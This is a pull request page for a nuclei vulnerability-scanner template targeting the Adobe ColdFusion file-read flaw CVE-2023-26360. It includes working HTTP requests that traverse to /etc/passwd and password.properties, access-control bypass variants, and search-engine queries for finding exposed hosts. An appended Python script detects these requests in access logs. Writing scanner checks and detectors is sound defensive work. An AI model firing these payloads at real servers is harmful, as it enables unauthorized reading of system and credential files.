Adding access control check for CVE-2023-26360 #11398

Open. Wants to merge 1 commit into base: main.


@7own 7own commented Dec 20, 2024

Template / PR Information

Sometimes CVE-2023-44352 cannot be exploited as is and requires an additional access control bypass.
With the provided template update, if the instance is vulnerable to CVE-2023-29298 and/or CVE-2023-38205, CVE-2023-44352 could be exploited, so it should be raised to the end user.

Template Validation

I've validated this template locally?

  • YES
  • NO

Additional Details (leave it blank if not applicable)

Additional References:

@GeorginaReeder

Thanks for your contribution @7own ! :)

@ritikchaddha ritikchaddha self-assigned this Dec 23, 2024
@ritikchaddha
Contributor

Hello @7own, we appreciate your efforts in updating the template and making it more suitable. Your contribution has been truly valuable to us.

While we cannot edit the template you provided, I have a few changes to suggest. I'm sharing them below so you can push those changes from your end.

id: CVE-2023-26360

info:
  name: Adobe ColdFusion - Local File Read
  author: DhiyaneshDK,7own
  severity: high
  description: |
    Unauthenticated Arbitrary File Read vulnerability due to deserialization of untrusted data in Adobe ColdFusion. The vulnerability affects ColdFusion 2021 Update 5 and earlier as well as ColdFusion 2018 Update 15 and earlier.
  impact: |
    This vulnerability can lead to unauthorized access to sensitive information stored on the server.
  remediation: |
    Apply the necessary security patches or updates provided by Adobe to fix the vulnerability.
  reference:
    - https://attackerkb.com/topics/F36ClHTTIQ/cve-2023-26360/rapid7-analysis
    - https://nvd.nist.gov/vuln/detail/CVE-2023-26360
    - https://helpx.adobe.com/security/products/coldfusion/apsb23-25.html
    - http://packetstormsecurity.com/files/172079/Adobe-ColdFusion-Unauthenticated-Remote-Code-Execution.html
    - https://github.com/Ostorlab/KEV
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:N/A:N
    cvss-score: 8.6
    cve-id: CVE-2023-26360
    cwe-id: CWE-284
    epss-score: 0.96298
    epss-percentile: 0.99537
    cpe: cpe:2.3:a:adobe:coldfusion:2018:-:*:*:*:*:*:*
  metadata:
    verified: true
    max-request: 5
    vendor: adobe
    product: coldfusion
    shodan-query:
      - http.component:"Adobe ColdFusion"
      - http.component:"adobe coldfusion"
      - http.title:"coldfusion administrator login"
      - cpe:"cpe:2.3:a:adobe:coldfusion"
    fofa-query:
      - title="coldfusion administrator login"
      - app="adobe-coldfusion"
    google-query: intitle:"coldfusion administrator login"
  tags: cve2023,cve,packetstorm,adobe,coldfusion,lfi,kev

http:
  - raw:
      - |
        POST /cf_scripts/scripts/ajax/ckeditor/plugins/filemanager/iedit.cfc?method=wizardHash&_cfclient=true&returnFormat=wddx&inPassword=foo HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded

        _variables=%7b%22_metadata%22%3a%7b%22classname%22%3a%22i/../lib/password.properties%22%7d%2c%22_variables%22%3a%5b%5d%7d

      - |
        POST /cf_scripts/scripts/ajax/ckeditor/plugins/filemanager/iedit.cfc?method=wizardHash&_cfclient=true&returnFormat=wddx&inPassword=foo HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded

        _variables={"about":{"_metadata":{"classname":"../../../../../../../../../../../etc/passwd"}, "_variables":{}}}

      # Direct request to the CFIDE wizard endpoint, with no access control bypass
      - |
        POST /CFIDE/wizards/common/utils.cfc?method=wizardHash&inPassword=foo&_cfclient=true&returnFormat=wddx HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded

        _variables={"about":{"_metadata":{"classname":"../../../../../../../../../../../etc/passwd"}, "_variables":{}}}

      # Same endpoint through the /..CFIDE path form (access control bypass, CVE-2023-38205)
      - |
        POST /cfusion/..CFIDE/wizards/common/utils.cfc?method=wizardHash&inPassword=foo&_cfclient=true&returnFormat=wddx HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded

        _variables={"about":{"_metadata":{"classname":"../../../../../../../../../../../etc/passwd"}, "_variables":{}}}

      # Same endpoint with a doubled leading slash (access control bypass, CVE-2023-29298)
      - |
        POST //CFIDE/wizards/common/utils.cfc?method=wizardHash&inPassword=foo&_cfclient=true&returnFormat=wddx HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded

        _variables={"about":{"_metadata":{"classname":"../../../../../../../../../../../etc/passwd"}, "_variables":{}}}

    stop-at-first-match: true
    matchers-condition: or
    matchers:
      - type: word
        part: body
        words:
          - "password="
          - "encrypted=true"
          - "adobe"
        condition: and

      - type: regex
        regex:
          - "root:.*:0:0:"
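
Added example, not part of this pull request or of the nuclei-templates project: a Python check that scans web access logs for the request shape the template above sends (a `.cfc` target with `_cfclient=true`) and separates the direct path from the `//CFIDE` and `/..CFIDE` forms. The log lines are constructed, and the combined log format and all function names are assumptions.

```python
import re
from urllib.parse import parse_qs

# Constructed access-log lines (combined log format); not real traffic.
SAMPLE_LOG = '''\
203.0.113.7 - - [20/Dec/2024:10:01:02 +0000] "POST /CFIDE/wizards/common/utils.cfc?method=wizardHash&inPassword=foo&_cfclient=true&returnFormat=wddx HTTP/1.1" 403 512
203.0.113.7 - - [20/Dec/2024:10:01:03 +0000] "POST //CFIDE/wizards/common/utils.cfc?method=wizardHash&inPassword=foo&_cfclient=true&returnFormat=wddx HTTP/1.1" 200 1830
203.0.113.7 - - [20/Dec/2024:10:01:04 +0000] "POST /cfusion/..CFIDE/wizards/common/utils.cfc?method=wizardHash&inPassword=foo&_cfclient=true&returnFormat=wddx HTTP/1.1" 200 1830
198.51.100.4 - - [20/Dec/2024:10:02:00 +0000] "GET /app/orders.cfc?method=list&returnFormat=json HTTP/1.1" 200 940
198.51.100.9 - - [20/Dec/2024:10:03:00 +0000] "POST /cf_scripts/scripts/ajax/ckeditor/plugins/filemanager/iedit.cfc?method=wizardHash&_cfclient=true&returnFormat=wddx&inPassword=foo HTTP/1.1" 200 2048
'''

LINE_RE = re.compile(r'^(\S+) \S+ \S+ \[[^\]]+\] "(\S+) (\S+) [^"]*" (\d{3}) ')

def classify(target):
    """Label a request target that matches the template's shape, else return None."""
    # Split by hand: urlsplit() would read a leading "//CFIDE" as a host name.
    path, _, query = target.partition("?")
    if not path.lower().endswith(".cfc"):
        return None
    params = parse_qs(query, keep_blank_values=True)
    if [v.lower() for v in params.get("_cfclient", [])] != ["true"]:
        return None
    if path.startswith("//"):
        return "double-slash"
    # A segment such as "..CFIDE": two dots glued to a directory name.
    if any(s.startswith("..") and len(s) > 2 for s in path.split("/")):
        return "dotdot-prefix"
    return "direct"

def scan(log_text):
    """Return (client, status, label) for every log line that classify() flags."""
    hits = []
    for line in log_text.splitlines():
        m = LINE_RE.match(line)
        if not m:
            continue
        client, _method, target, status = m.groups()
        label = classify(target)
        if label:
            hits.append((client, int(status), label))
    return hits

def bypass_successes(hits):
    """Bypass-form requests answered with 200, the ones to triage first."""
    return [h for h in hits if h[2] != "direct" and h[1] == 200]
```

A 403 on the direct path followed by a 200 on a bypass form from the same client is the pattern the updated template is meant to surface.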
